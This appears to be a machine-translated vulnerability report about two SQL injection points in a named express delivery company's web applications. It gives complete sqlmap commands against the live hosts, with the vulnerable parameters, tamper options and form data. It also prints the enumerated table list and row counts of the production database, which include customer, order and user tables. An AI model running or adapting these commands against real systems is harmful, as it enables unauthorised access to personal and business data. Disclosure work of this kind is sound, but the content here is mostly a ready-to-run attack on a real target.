Express Delivery Security tiandihuayu two SQL injection involves a large amount of information

Express Delivery Security tiandihuayu two SQL injection involves a large amount of information

Humanoid artifacts ~

Two injection points

Case 1:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://ttq.hoau.net:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464" -p ebProductTypeId --random-agent --tamper=space2comment -D "thoms" --tables --count

Case 2：

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://old.hoau.net/05xgnew/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTUwOTQ0NDQ3MWRktA6PBCi8proujSc4OHkUB7epxyA%3D&gh=1&mm=1&btn=%B5%C7%C2%BC&__EVENTVALIDATION=%2FwEWBAK%2FjdP5AQK578rvDALD77bvDAKSoqqWD8OU6dcTGppipGwM0u%2B3IgB7ezme" -p gh --random-agent --dbs

Case2 is time-based blind injection, which is too slow ..

 

Case 1：

Database: thoms+--------------------------------+---------+| Table                          | Entries |+--------------------------------+---------+| dbo.CD_STATUS_HISTORY          | 7876790 || dbo.EO_ORDER_MATERIEL          | 1763946 || dbo.OMS_DC_ORDER               | 1242568 || dbo.EO_ORDER_EXCEPTION_HISTORY | 460400  || dbo.EB_MOBILE_CONTACT          | 417779  || dbo.EB_PRODUCT_DETAIL          | 400910  || dbo.EO_DISTPACH_VEHICLE        | 384321  || dbo.EI_ALIBABA_ORDER_STATUS    | 380105  || dbo.EB_PRODUCT_DETAIL_BACK     | 285028  || dbo.EO_ORDER                   | 159037  || dbo.EI_TAOBAO_CARGO            | 122364  || dbo.EB_SATISFY                 | 72506   || dbo.EI_TAOBAO_ORDER            | 59354   || dbo.EI_NET_ORDER               | 30599   || dbo.TMP_PRICE                  | 23231   || dbo.EB_CUSTOMER                | 22919   || dbo.EB_CUSTOMER_CONTACT        | 22904   || dbo.EB_NET_SERIAL              | 17053   || dbo.EB_OMS_HR                  | 16905   || dbo.CD_MESSAGE_CONTEXT         | 13739   || dbo.EO_ORDER_EXCEPTION         | 13157   || dbo.EB_SHIPPER_ADDRESS         | 9638    || dbo.OMS_PRICE_FREIGHT          | 5791    || dbo.EI_NET_ORDER_RECORD        | 5246    || dbo.EB_DISCOUNT                | 4216    || dbo.ES_ESUG_2_ESUS             | 3671    || dbo.ES_USER                    | 3660    || dbo.EB_PLACE                   | 3409    || dbo.EB_PLACE_BAK               | 3409    || dbo.EB_PLACE_PMS               | 3398    || dbo.EI_CUSTOMER_ORDER_CARGO    | 3151    || dbo.EI_CUSTOMER_ORDER          | 3147    || dbo.EB_CUSTOMER_DISCOUNT       | 3006    || dbo.tmp_city_con               | 2997    || dbo.EB_VEHICLE                 | 2554    || dbo.ES_CONTROL_PARAM           | 1978    || dbo.ES_ESCO_2_ESCP             | 1967    || dbo.ES_COMPANY                 | 1802    || dbo.EB_OUT_CUSTOMER            | 726     || dbo.ES_ESRO_2_ESFR             | 666     || dbo.EB_CODE_MASTER             | 651     || dbo.ES_ESHP_2_ESCO             | 625     || dbo.ES_FUNCTION_RESOURCE       | 444     || dbo.ES_FUNCTION_PERMISSION     | 361     || dbo.EB_CODE_MASTER_TYPE        | 113     || dbo.ES_ESHP_2_ESUS             | 89      || dbo.ES_HOOD_PLATFORM           | 86      || dbo.ES_ESIE_2_ESDR             | 72      || dbo.CD_STATUS_ACTION           | 67      || dbo.ES_DATASOURCE_RES          | 67      || dbo.CD_EXCEPTION_ITEM          | 50      || dbo.CD_ACTION_DEFINED          | 29      || dbo.CD_ACTION_DEFINED_copy     | 29      || dbo.ES_ESUG_2_ESRO             | 28      || dbo.CD_STATUSES_DETAIL         | 22      || dbo.EB_ORDER_TYPE              | 22      || dbo.EB_CUSTOMER_ROLE           | 16      || dbo.ES_USER_2_POST             | 16      || dbo.ES_ROLE                    | 12      || dbo.ES_USER_GROUP              | 11      || dbo.EB_SHIPPER                 | 8       || dbo.CD_STATUS_SMS              | 6       || dbo.CD_NOTIFY_EXCEPTION        | 5       || dbo.CD_TIMER_ACTION            | 5       || dbo.CD_TIMER_DEFINE            | 5       || dbo.EB_CUSTOMER_URL            | 4       || dbo.EB_EBPJ_2_ESUS             | 4       || dbo.EB_SERVICES                | 4       || dbo.ES_COUNTER                 | 4       || dbo.ES_DATASOURCE              | 4       || dbo.ES_DIY_REPORT              | 4       || dbo.CD_BILL_NO_RULE            | 3       || dbo.EB_PRODUCT_TYPE            | 3       || dbo.OMS_PRICE_CUSTOMER         | 3       || dbo.OMS_PRICE_HEAD             | 3       || dbo.CD_STATUSES_HEADER         | 2       || dbo.COUNTY_FIRSTCOMPANY        | 2       || dbo.EB_CUSTOMER_CHECK          | 2       || dbo.EB_CUSTOMER_MILEAGE        | 2       || dbo.EB_EBCU_2_EBSP             | 2       || dbo.EB_REGION                  | 2       || dbo.EO_TYPE_CONTENT            | 2       || dbo.TMP_CITY                   | 2       || dbo.DISCOUNT                   | 1       || dbo.EB_CERTIFICATION           | 1       || dbo.EB_EBPJ_2_EBCC             | 1       || dbo.EB_FEE_HEAD                | 1       || dbo.EB_LINE                    | 1       || dbo.EB_ORDER_TASK              | 1       || dbo.EB_PORT                    | 1       || dbo.EB_PROJECT                 | 1       || dbo.EO_ORDER_ANOMALY           | 1       || dbo.ES_DEPARTMENT              | 1       || dbo.ES_ESDA_2_ESCO             | 1       || dbo.ES_MESSAGE_TYPE            | 1       || dbo.ES_STATION                 | 1       |+--------------------------------+---------+

 

Case 2：
 

 

 

It's too slow to run, just prove the problem.

Solution:

Filter and discard systems are immediately deprecated.